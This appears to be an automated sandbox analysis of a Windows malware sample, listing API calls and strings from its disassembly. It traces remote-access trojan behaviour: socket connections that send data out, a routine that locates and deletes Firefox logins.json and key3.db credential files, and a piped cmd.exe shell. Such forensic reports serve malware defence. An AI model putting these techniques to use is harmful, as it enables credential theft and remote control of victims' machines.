??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ * 2 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 827->830 831 403c48-403c4f 827->831 828->827 833 403c55-403c6d wcscmp 831->833 834 403d39-403da2 ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ call 4043bc ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z 831->834 833->834 837 403c73-403c85 wcscmp 833->837 843 403e64-403e70 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ 834->843 844 403da8-403e47 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ call 4113ba ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z * 2 call 4023c0 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 834->844 837->834 840 403c8b-403d10 ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ * 2 ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z * 2 call 403f4d 837->840 848 403d12-403d28 _CxxThrowException 840->848 849 403d2d-403d33 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ 840->849 843->827 844->843 853 403e49-403e5f _CxxThrowException 844->853 848->849 849->834 853->843
                                                APIs
                                                • __EH_prolog.LIBCMT ref: 00403AC6
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00403AE3
                                                • socket.WS2_32(00000000,00000001,00000006), ref: 00403AF6
                                                • connect.WS2_32(00000000,00419298,00000010), ref: 00403B05
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00419288,?,00000006), ref: 00403B2E
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,00000006), ref: 00403B38
                                                  • Part of subcall function 004023C0: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60([INFO],?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 004023CA
                                                  • Part of subcall function 004023C0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60([DataStart],00000013,?,?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 004023E3
                                                  • Part of subcall function 004023C0: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 004023EE
                                                  • Part of subcall function 004023C0: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000F,?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 004023FB
                                                  • Part of subcall function 004023C0: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 0040240D
                                                  • Part of subcall function 004023C0: ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 00402418
                                                  • Part of subcall function 004023C0: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 00402427
                                                  • Part of subcall function 004023C0: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 00402431
                                                  • Part of subcall function 004023C0: send.WS2_32(?,00000000), ref: 0040243B
                                                  • Part of subcall function 004023C0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 00402492
                                                  • Part of subcall function 004023C0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 0040249B
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00000006), ref: 00403B5E
                                                • _CxxThrowException.MSVCRT(00000001,00414F18), ref: 00403B7E
                                                • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00000006), ref: 00403B8C
                                                • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000006), ref: 00403B96
                                                • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000006), ref: 00403BA0
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,00413894,?), ref: 00403BC6
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?), ref: 00403BD0
                                                • FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00403BD7
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00403BE6
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00413670,?), ref: 00403C05
                                                • _CxxThrowException.MSVCRT(00000002,00414F18), ref: 00403C2B
                                                • FindNextFileW.KERNEL32(000000FF,?,?,?,?), ref: 00403C3A
                                                • wcscmp.MSVCRT ref: 00403C67
                                                • wcscmp.MSVCRT ref: 00403C7F
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00413888), ref: 00403CA4
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,?,00000000), ref: 00403CB6
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00403CC6
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00403CD4
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00403CE0
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00403CEF
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00403D01
                                                  • Part of subcall function 00403F4D: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00403F62
                                                  • Part of subcall function 00403F4D: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(76322A40), ref: 00403F72
                                                  • Part of subcall function 00403F4D: ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 00403F7C
                                                  • Part of subcall function 00403F4D: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 00403F86
                                                  • Part of subcall function 00403F4D: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,00413894,?), ref: 00403FA9
                                                  • Part of subcall function 00403F4D: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?), ref: 00403FB3
                                                  • Part of subcall function 00403F4D: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00403FBA
                                                  • Part of subcall function 00403F4D: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00403FC6
                                                  • Part of subcall function 00403F4D: FindNextFileW.KERNEL32(000000FF,?,?,?,?), ref: 00403FE0
                                                  • Part of subcall function 00403F4D: wcscmp.MSVCRT ref: 0040400D
                                                  • Part of subcall function 00403F4D: wcscmp.MSVCRT ref: 00404025
                                                  • Part of subcall function 00403F4D: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,0000005C), ref: 0040403D
                                                  • Part of subcall function 00403F4D: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,000000FF,00000000), ref: 0040404F
                                                  • Part of subcall function 00403F4D: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z.MSVCP60(?,00000000), ref: 0040405C
                                                  • Part of subcall function 00403F4D: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040406A
                                                  • Part of subcall function 00403F4D: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00404073
                                                  • Part of subcall function 00403F4D: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00404082
                                                  • Part of subcall function 00403F4D: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00404091
                                                • _CxxThrowException.MSVCRT(00000003,00414F18), ref: 00403D28
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000003,00414F18), ref: 00403D33
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,?,?), ref: 00403D4D
                                                • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,?), ref: 00403D5F
                                                • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?), ref: 00403D6C
                                                • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?), ref: 00403D79
                                                • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000), ref: 00403D94
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000010,00000250,?), ref: 00403DC1
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00403DCB
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403DD7
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00419288,?), ref: 00403E03
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 00403E0D
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00403E33
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00403E3F
                                                • _CxxThrowException.MSVCRT(00000004,00414F18), ref: 00403E5F
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000004,00414F18,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00403E6A
                                                • FindClose.KERNEL32(000000FF,?,?,?), ref: 00403E7C
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00419288,?), ref: 00403E99
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 00403EA3
                                                  • Part of subcall function 004023C0: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 00402447
                                                  • Part of subcall function 004023C0: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 00402451
                                                  • Part of subcall function 004023C0: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,00000000,?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 0040246B
                                                  • Part of subcall function 004023C0: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 00402475
                                                  • Part of subcall function 004023C0: send.WS2_32(?,00000000), ref: 0040247F
                                                  • Part of subcall function 004023C0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 00402489
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00403EBB
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00403EC4
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 00403EDC
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 00403EE5
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 00403EEE
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 00403EF7
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 00403F00
                                                • atoi.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00403ECB
                                                  • Part of subcall function 004041EA: __EH_prolog.LIBCMT ref: 004041EF
                                                  • Part of subcall function 004041EA: closesocket.WS2_32(?), ref: 00404231
                                                  • Part of subcall function 004041EA: TerminateThread.KERNEL32(?,00000000,?,00000000,?,?,?,?,00403F34,00000000), ref: 00404243
                                                • _CxxThrowException.MSVCRT(00000000,00000000), ref: 00403F19
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000,00000000,00419298,00000010,00000000,00000001,00000006), ref: 00403F21
                                                • atoi.MSVCRT(00000000), ref: 00403F28
                                                • FindClose.KERNEL32(?), ref: 00403F39
                                                • ExitThread.KERNEL32 ref: 00403F41
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$G@std@@$D@2@@std@@$G@2@@std@@$??1?$basic_string@$??0?$basic_string@Hstd@@V?$basic_string@$V10@0@$?begin@?$basic_string@D@2@@0@FindG@2@@0@V01@@$?c_str@?$basic_string@D@1@@ExceptionThrow$?length@?$basic_string@FileV10@wcscmp$?end@?$basic_string@G@1@@$?data@?$basic_string@A?$basic_string@CloseFirstH_prologNextThreadV01@atoisend$??4?$basic_string@?empty@?$basic_string@?find@?$basic_string@ExitTerminateV12@Y?$basic_string@closesocketconnectsocket
                                                • String ID:
                                                • API String ID: 338953085-0
                                                • Opcode ID: e4fe102e86d75fecefdd60d8df8a629f5555752c243cf6481f30faeacaea79b2
                                                • Instruction ID: cc27bc7d91e85ff8e2286a6ab4d93af355333c54bd8e6d9c49dfcc8465a49270
                                                • Opcode Fuzzy Hash: e4fe102e86d75fecefdd60d8df8a629f5555752c243cf6481f30faeacaea79b2
                                                • Instruction Fuzzy Hash: 3DC15272900119ABCB14FFA0DD49ADE7B7CEB14706F0041AAF51AE20A1EF745B99CB58

                                                Control-flow Graph

                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,75920F00,00000000), ref: 004065EE
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,75920F00,00000000), ref: 004065FB
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,75920F00,00000000), ref: 00406608
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(\AppData\Roaming\Mozilla\Firefox\Profiles\,?,?,75920F00,00000000), ref: 0040661A
                                                • getenv.MSVCRT ref: 00406626
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000,75920F00,00000000), ref: 00406632
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,00000000), ref: 0040663E
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,00000000), ref: 00406647
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,00000000), ref: 00406650
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,00413A34,?,?,?,00000000), ref: 0040666A
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,00000000), ref: 00406674
                                                • FindFirstFileA.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0040667B
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 00406687
                                                • FindClose.KERNEL32(000000FF,?,?,?,?,?,00000000), ref: 00406695
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Firefox StoredLogins not found],?,?,?,?,?,?,?,?,?,?,00000000), ref: 004066AB
                                                  • Part of subcall function 00404857: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,00000000,?,00406CE6), ref: 0040486A
                                                  • Part of subcall function 00404857: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,00000000,?,00406CE6), ref: 0040487D
                                                  • Part of subcall function 00404857: SetEvent.KERNEL32(00000000,?,00406CE6), ref: 00404886
                                                  • Part of subcall function 00404857: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000,?,00406CE6), ref: 00404895
                                                • FindNextFileA.KERNEL32(000000FF,?,?,?,?,?,?,00000000), ref: 004066CC
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,?,\logins.json,?,?,?,?,?,00000000), ref: 00406774
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,\logins.json,?,?,?,?,?,00000000), ref: 00406781
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,\logins.json,?,?,?,?,?,00000000), ref: 0040678D
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\logins.json,?,?,?,?,?,00000000), ref: 00406796
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\logins.json,?,?,?,?,?,00000000), ref: 0040679F
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?,?,?,00000000), ref: 004067B9
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 004067C6
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 004067D2
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 004067DB
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 004067E4
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 004067F5
                                                • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 004067FC
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000,?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json), ref: 00406904
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000,?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json), ref: 0040690D
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000,?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json), ref: 00406916
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@D@1@@V01@V01@@V10@$??4?$basic_string@FileFind$?c_str@?$basic_string@Y?$basic_string@$CloseDeleteEventFirstNextV10@@getenv
                                                • String ID: [Firefox StoredLogins cleared!]$[Firefox StoredLogins not found]$UserProfile$\=A$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                • API String ID: 3561168790-3021229726
                                                • Opcode ID: 8dec6e1865cc65fef5d2f7a003ed874cdc0ec2c430f7498b7626bd15bcb46438
                                                • Instruction ID: e2470d7ded102eb906153271f236a5acc5975d4c50eae2a5205ef764ec797134
                                                • Opcode Fuzzy Hash: 8dec6e1865cc65fef5d2f7a003ed874cdc0ec2c430f7498b7626bd15bcb46438
                                                • Instruction Fuzzy Hash: 4991A672900149AFCF01BFA0DC699EE7F79EF15306F0485B6E402E3190EB399699CB59
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00402AFF
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00402B1E
                                                • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(004197D8,cmd.exe), ref: 00402B42
                                                • getenv.MSVCRT ref: 00402B57
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00402B61
                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00413764), ref: 00402B6E
                                                • CreatePipe.KERNEL32(00419718,004197E8,00419768,00000000), ref: 00402BA4
                                                • CreatePipe.KERNEL32(004197D0,004197EC,00419768,00000000), ref: 00402BBE
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00419720,004197F0), ref: 00402C15
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000,00000001,00000000,00000000,00000000), ref: 00402C29
                                                • CreateProcessA.KERNEL32(00000000,00000000), ref: 00402C31
